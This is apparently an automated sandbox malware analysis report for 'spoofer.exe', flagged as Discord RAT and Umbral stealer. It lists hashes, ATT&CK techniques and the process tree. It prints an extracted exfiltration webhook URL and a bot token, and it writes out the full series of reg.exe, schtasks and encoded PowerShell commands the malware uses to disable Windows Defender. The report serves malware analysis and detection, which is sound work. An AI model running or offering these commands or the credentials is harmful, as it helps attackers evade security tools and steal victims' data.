discordrat | 5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d

Analysis

max time kernel
130s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20231222-en
resource tags

arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system
submitted
19/01/2024, 22:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

spoofer.exe
Size

442KB
MD5

d5a84036071756dee960de255bd6ab94
SHA1

83b439582a8f3392f18dde97b56d937c518b1cd2
SHA256

5cac485680e36e9e3cea0867d1373edff3a8995a20d21a2b7aa38247a0a3eb1d
SHA512

fe0dec1e8422d9dd74431ccccff23e7083d356498ff98dc1c5680e1553c5145dbf1c854e48263c5d58a18c87c7bc7016294518ec1491045da7f62c1077a07779
SSDEEP

12288:3o0NHvykT8QNmJCDWs2qUa3zYgNl3Qc65snvJ:3phFT8QC6WsVUM7NxQcsaJ

Score

10^/10

discordrat umbral evasion persistence rat rootkit stealer trojan

Malware Config

Extracted

Family

umbral

https://ptb.discord.com/api/webhooks/1197286741825048616/mPoY62Pti_IE-hGcDYD9Kd5GhKzKQHzuySPby-xlg9GCRDWrviTGJ9au_QMU1pKDVh50

Extracted

Family

discordrat

Attributes

discord_token
MTE5MzczNzA3MzIzNzE4MDQyNg.GQDWc0.k4Yc3XgNEdmji15f8P6ui2A0sVB2zvpOmkNPlw
server_id
1196510448573489273

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x00070000000231ed-32.dat	family_umbral
behavioral2/memory/4448-35-0x000001F50DD20000-0x000001F50DD60000-memory.dmp	family_umbral

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Windows Service

T1543.003

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	spoofer.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation	cleaner.exe

Executes dropped EXE 3 IoCs

pid	Process
2648	cleaner.exe
4784	Spoofer.exe
4448	Woofer.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in Windows directory 3 IoCs

description	ioc	Process
File created	C:\Windows\cleaner.exe	spoofer.exe
File created	C:\Windows\Spoofer.exe	spoofer.exe
File created	C:\Windows\Woofer.exe	spoofer.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
4908	powershell.exe
4908	powershell.exe
4908	powershell.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeDebugPrivilege	4784	Spoofer.exe
Token: SeDebugPrivilege	4448	Woofer.exe
Token: SeDebugPrivilege	4908	powershell.exe
Token: SeIncreaseQuotaPrivilege	2620	wmic.exe
Token: SeSecurityPrivilege	2620	wmic.exe
Token: SeTakeOwnershipPrivilege	2620	wmic.exe
Token: SeLoadDriverPrivilege	2620	wmic.exe
Token: SeSystemProfilePrivilege	2620	wmic.exe
Token: SeSystemtimePrivilege	2620	wmic.exe
Token: SeProfSingleProcessPrivilege	2620	wmic.exe
Token: SeIncBasePriorityPrivilege	2620	wmic.exe
Token: SeCreatePagefilePrivilege	2620	wmic.exe
Token: SeBackupPrivilege	2620	wmic.exe
Token: SeRestorePrivilege	2620	wmic.exe
Token: SeShutdownPrivilege	2620	wmic.exe
Token: SeDebugPrivilege	2620	wmic.exe
Token: SeSystemEnvironmentPrivilege	2620	wmic.exe
Token: SeRemoteShutdownPrivilege	2620	wmic.exe
Token: SeUndockPrivilege	2620	wmic.exe
Token: SeManageVolumePrivilege	2620	wmic.exe
Token: 33	2620	wmic.exe
Token: 34	2620	wmic.exe
Token: 35	2620	wmic.exe
Token: 36	2620	wmic.exe
Token: SeIncreaseQuotaPrivilege	2620	wmic.exe
Token: SeSecurityPrivilege	2620	wmic.exe
Token: SeTakeOwnershipPrivilege	2620	wmic.exe
Token: SeLoadDriverPrivilege	2620	wmic.exe
Token: SeSystemProfilePrivilege	2620	wmic.exe
Token: SeSystemtimePrivilege	2620	wmic.exe
Token: SeProfSingleProcessPrivilege	2620	wmic.exe
Token: SeIncBasePriorityPrivilege	2620	wmic.exe
Token: SeCreatePagefilePrivilege	2620	wmic.exe
Token: SeBackupPrivilege	2620	wmic.exe
Token: SeRestorePrivilege	2620	wmic.exe
Token: SeShutdownPrivilege	2620	wmic.exe
Token: SeDebugPrivilege	2620	wmic.exe
Token: SeSystemEnvironmentPrivilege	2620	wmic.exe
Token: SeRemoteShutdownPrivilege	2620	wmic.exe
Token: SeUndockPrivilege	2620	wmic.exe
Token: SeManageVolumePrivilege	2620	wmic.exe
Token: 33	2620	wmic.exe
Token: 34	2620	wmic.exe
Token: 35	2620	wmic.exe
Token: 36	2620	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3968 wrote to memory of 4908	3968	spoofer.exe	88
PID 3968 wrote to memory of 4908	3968	spoofer.exe	88
PID 3968 wrote to memory of 4908	3968	spoofer.exe	88
PID 3968 wrote to memory of 2648	3968	spoofer.exe	89
PID 3968 wrote to memory of 2648	3968	spoofer.exe	89
PID 3968 wrote to memory of 4784	3968	spoofer.exe	91
PID 3968 wrote to memory of 4784	3968	spoofer.exe	91
PID 3968 wrote to memory of 4448	3968	spoofer.exe	92
PID 3968 wrote to memory of 4448	3968	spoofer.exe	92
PID 2648 wrote to memory of 5044	2648	cleaner.exe	93
PID 2648 wrote to memory of 5044	2648	cleaner.exe	93
PID 5044 wrote to memory of 2304	5044	cmd.exe	95
PID 5044 wrote to memory of 2304	5044	cmd.exe	95
PID 4448 wrote to memory of 2620	4448	Woofer.exe	96
PID 4448 wrote to memory of 2620	4448	Woofer.exe	96
PID 5044 wrote to memory of 720	5044	cmd.exe	98
PID 5044 wrote to memory of 720	5044	cmd.exe	98
PID 5044 wrote to memory of 2848	5044	cmd.exe	99
PID 5044 wrote to memory of 2848	5044	cmd.exe	99
PID 5044 wrote to memory of 408	5044	cmd.exe	100
PID 5044 wrote to memory of 408	5044	cmd.exe	100
PID 5044 wrote to memory of 1184	5044	cmd.exe	103
PID 5044 wrote to memory of 1184	5044	cmd.exe	103
PID 5044 wrote to memory of 2624	5044	cmd.exe	102
PID 5044 wrote to memory of 2624	5044	cmd.exe	102
PID 5044 wrote to memory of 544	5044	cmd.exe	104
PID 5044 wrote to memory of 544	5044	cmd.exe	104
PID 5044 wrote to memory of 904	5044	cmd.exe	105
PID 5044 wrote to memory of 904	5044	cmd.exe	105
PID 5044 wrote to memory of 3860	5044	cmd.exe	106
PID 5044 wrote to memory of 3860	5044	cmd.exe	106
PID 5044 wrote to memory of 1660	5044	cmd.exe	107
PID 5044 wrote to memory of 1660	5044	cmd.exe	107
PID 5044 wrote to memory of 4632	5044	cmd.exe	130
PID 5044 wrote to memory of 4632	5044	cmd.exe	130
PID 5044 wrote to memory of 3600	5044	cmd.exe	129
PID 5044 wrote to memory of 3600	5044	cmd.exe	129
PID 5044 wrote to memory of 4940	5044	cmd.exe	128
PID 5044 wrote to memory of 4940	5044	cmd.exe	128
PID 5044 wrote to memory of 4944	5044	cmd.exe	109
PID 5044 wrote to memory of 4944	5044	cmd.exe	109
PID 5044 wrote to memory of 3136	5044	cmd.exe	108
PID 5044 wrote to memory of 3136	5044	cmd.exe	108
PID 5044 wrote to memory of 2776	5044	cmd.exe	110
PID 5044 wrote to memory of 2776	5044	cmd.exe	110
PID 5044 wrote to memory of 380	5044	cmd.exe	111
PID 5044 wrote to memory of 380	5044	cmd.exe	111
PID 5044 wrote to memory of 3432	5044	cmd.exe	112
PID 5044 wrote to memory of 3432	5044	cmd.exe	112
PID 5044 wrote to memory of 4000	5044	cmd.exe	113
PID 5044 wrote to memory of 4000	5044	cmd.exe	113
PID 5044 wrote to memory of 4132	5044	cmd.exe	114
PID 5044 wrote to memory of 4132	5044	cmd.exe	114
PID 5044 wrote to memory of 4732	5044	cmd.exe	117
PID 5044 wrote to memory of 4732	5044	cmd.exe	117
PID 5044 wrote to memory of 864	5044	cmd.exe	116
PID 5044 wrote to memory of 864	5044	cmd.exe	116
PID 5044 wrote to memory of 4796	5044	cmd.exe	115
PID 5044 wrote to memory of 4796	5044	cmd.exe	115
PID 5044 wrote to memory of 4176	5044	cmd.exe	127
PID 5044 wrote to memory of 4176	5044	cmd.exe	127
PID 5044 wrote to memory of 2168	5044	cmd.exe	125
PID 5044 wrote to memory of 2168	5044	cmd.exe	125
PID 5044 wrote to memory of 3160	5044	cmd.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\spoofer.exe"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:3968
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcQB3ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHQAZgB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHAAawBoACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGIAdQB1ACMAPgA="
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4908
- C:\Windows\cleaner.exe
  "C:\Windows\cleaner.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\466F.tmp\4670.tmp\4671.bat C:\Windows\cleaner.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
      4⤵
      PID:2304
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:720
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
      4⤵
      PID:2848
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableRoutinelyTakingAction" /t REG_DWORD /d "1" /f
      4⤵
      PID:408
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:2624
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
      4⤵
      PID:1184
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:544
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:904
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:3860
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
      4⤵
      Modifies Windows Defender Real-time Protection settings
      PID:1660
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:3136
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
      4⤵
      PID:4944
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
      4⤵
      PID:2776
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
      4⤵
      PID:380
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
      4⤵
      PID:3432
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
      4⤵
      PID:4000
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
      4⤵
      PID:4132
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
      4⤵
      PID:4796
  - - C:\Windows\system32\reg.exe
      reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
      4⤵
      PID:864
  - - C:\Windows\system32\schtasks.exe
      schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
      4⤵
      PID:4732
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:3160
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:3840
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:3412
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:3580
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      Modifies security service
      PID:3544
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
      4⤵
      PID:2096
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:2168
  - - C:\Windows\system32\reg.exe
      reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      4⤵
      PID:4176
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
      4⤵
      PID:4940
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
      4⤵
      PID:3600
  - - C:\Windows\system32\reg.exe
      reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
      4⤵
      PID:4632
- C:\Windows\Spoofer.exe
  "C:\Windows\Spoofer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4784
- C:\Windows\Woofer.exe
  "C:\Windows\Woofer.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4448
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2620

C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv ynVRKuLpTUmmVNuyUEi97w.0.2
1⤵
PID:3412

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\466F.tmp\4670.tmp\4671.bat

Filesize
3KB

MD5
37a937d63e6dcc8f8de4b8847d210546

SHA1
98ca34f1a7cf66d583822b83cd1c65a1fb7f1d4a

SHA256
111ac48198ba45919584668ed9ad15010d316de7f1665f4d42ec249259f696bc

SHA512
062046aca604cf5f329590b1a9ee317974b45f0bdc18f70b74489ece55737480cbb5544d1ced8f5d0e8c66af4b38085ac4e70f26dac2b6d6a50d26f9b36e2b46

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wz2ko5ns.yar.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Windows\Spoofer.exe

Filesize
78KB

MD5
698d53d0e0b33c8eeec2dc5ee507e971

SHA1
a4c4999c0aeeb2552ec063960a37a4296bf6eb02

SHA256
3dbf21a8a065a297e0d16148f3931315e4e25e1872eed4fd9a256191571a223d

SHA512
5c6ec88ee5b93476f522d87f8edd4b8a1ce78ea47b8ee7d320941a092b5943877ff3a639a00589d6d2e937a41019ad12408576c4223d7a9ac87826d3385abef5

Download Submit
C:\Windows\Woofer.exe

Filesize
231KB

MD5
c0922cfbf0bc3b88f4ab89146f1c5225

SHA1
c9120012509c3942e0299c1c7eb9fe190b978917

SHA256
59f283a7f4a7d50e13c963bb2ae0b3ebd0433bb73f2d582b2c9dd0e7564bce0d

SHA512
d7aaed129723526b66eb8e7917e893426d035bb2583200680cc2683038203dfdd7d48d0deaece13ea4de7eefcd948a891e6f107d19dc0e5f64a0dd760f100b9f

Download Submit
C:\Windows\cleaner.exe

Filesize
127KB

MD5
86cb66d7f7740d8ae241ff6dae24a963

SHA1
19aff29c5319ba0bcbab649d16412b5e27f3e07c

SHA256
cea237087535cd1e6ed4c1fd199e9b297a2720eeac41eadd1976d2efda7bf9cf

SHA512
b8d1839e669795b0506448a2de98992ceccc5e24b4e6fb8c81397d3991cbfe56f0e285878ffcfe10a186bf2833343566208ae8d8af7b8f39ddbd2f316a410322

Download Submit
memory/4448-64-0x00007FFFFB1F0000-0x00007FFFFBCB1000-memory.dmp

Filesize
10.8MB

Download
memory/4448-39-0x00007FFFFB1F0000-0x00007FFFFBCB1000-memory.dmp

Filesize
10.8MB

Download
memory/4448-40-0x000001F5285A0000-0x000001F5285B0000-memory.dmp

Filesize
64KB

Download
memory/4448-35-0x000001F50DD20000-0x000001F50DD60000-memory.dmp

Filesize
256KB

Download
memory/4784-37-0x00007FFFFB1F0000-0x00007FFFFBCB1000-memory.dmp

Filesize
10.8MB

Download
memory/4784-93-0x0000021BD8950000-0x0000021BD8960000-memory.dmp

Filesize
64KB

Download
memory/4784-42-0x0000021BD8950000-0x0000021BD8960000-memory.dmp

Filesize
64KB

Download
memory/4784-92-0x00007FFFFB1F0000-0x00007FFFFBCB1000-memory.dmp

Filesize
10.8MB

Download
memory/4784-34-0x0000021BBE440000-0x0000021BBE458000-memory.dmp

Filesize
96KB

Download
memory/4784-60-0x0000021BD9370000-0x0000021BD9898000-memory.dmp

Filesize
5.2MB

Download
memory/4784-36-0x0000021BD8A30000-0x0000021BD8BF2000-memory.dmp

Filesize
1.8MB

Download
memory/4908-59-0x0000000006020000-0x0000000006374000-memory.dmp

Filesize
3.3MB

Download
memory/4908-79-0x00000000074D0000-0x0000000007573000-memory.dmp

Filesize
652KB

Download
memory/4908-46-0x0000000005D40000-0x0000000005D62000-memory.dmp

Filesize
136KB

Download
memory/4908-54-0x0000000005EB0000-0x0000000005F16000-memory.dmp

Filesize
408KB

Download
memory/4908-47-0x0000000002E20000-0x0000000002E30000-memory.dmp

Filesize
64KB

Download
memory/4908-44-0x0000000073F10000-0x00000000746C0000-memory.dmp

Filesize
7.7MB

Download
memory/4908-62-0x0000000006590000-0x00000000065DC000-memory.dmp

Filesize
304KB

Download
memory/4908-61-0x00000000064D0000-0x00000000064EE000-memory.dmp

Filesize
120KB

Download
memory/4908-41-0x0000000005590000-0x0000000005BB8000-memory.dmp

Filesize
6.2MB

Download
memory/4908-65-0x000000007F890000-0x000000007F8A0000-memory.dmp

Filesize
64KB

Download
memory/4908-66-0x0000000006AA0000-0x0000000006AD2000-memory.dmp

Filesize
200KB

Download
memory/4908-78-0x0000000002E20000-0x0000000002E30000-memory.dmp

Filesize
64KB

Download
memory/4908-77-0x0000000006A80000-0x0000000006A9E000-memory.dmp

Filesize
120KB

Download
memory/4908-48-0x0000000005E40000-0x0000000005EA6000-memory.dmp

Filesize
408KB

Download
memory/4908-67-0x0000000075500000-0x000000007554C000-memory.dmp

Filesize
304KB

Download
memory/4908-81-0x0000000007810000-0x000000000782A000-memory.dmp

Filesize
104KB

Download
memory/4908-82-0x0000000007880000-0x000000000788A000-memory.dmp

Filesize
40KB

Download
memory/4908-80-0x0000000007E50000-0x00000000084CA000-memory.dmp

Filesize
6.5MB

Download
memory/4908-83-0x0000000007AA0000-0x0000000007B36000-memory.dmp

Filesize
600KB

Download
memory/4908-84-0x0000000007A10000-0x0000000007A21000-memory.dmp

Filesize
68KB

Download
memory/4908-85-0x0000000007A50000-0x0000000007A5E000-memory.dmp

Filesize
56KB

Download
memory/4908-86-0x0000000007A60000-0x0000000007A74000-memory.dmp

Filesize
80KB

Download
memory/4908-87-0x0000000007B40000-0x0000000007B5A000-memory.dmp

Filesize
104KB

Download
memory/4908-88-0x0000000007A90000-0x0000000007A98000-memory.dmp

Filesize
32KB

Download
memory/4908-91-0x0000000073F10000-0x00000000746C0000-memory.dmp

Filesize
7.7MB

Download
memory/4908-43-0x0000000002E20000-0x0000000002E30000-memory.dmp

Filesize
64KB

Download
memory/4908-38-0x0000000004F20000-0x0000000004F56000-memory.dmp

Filesize
216KB

Download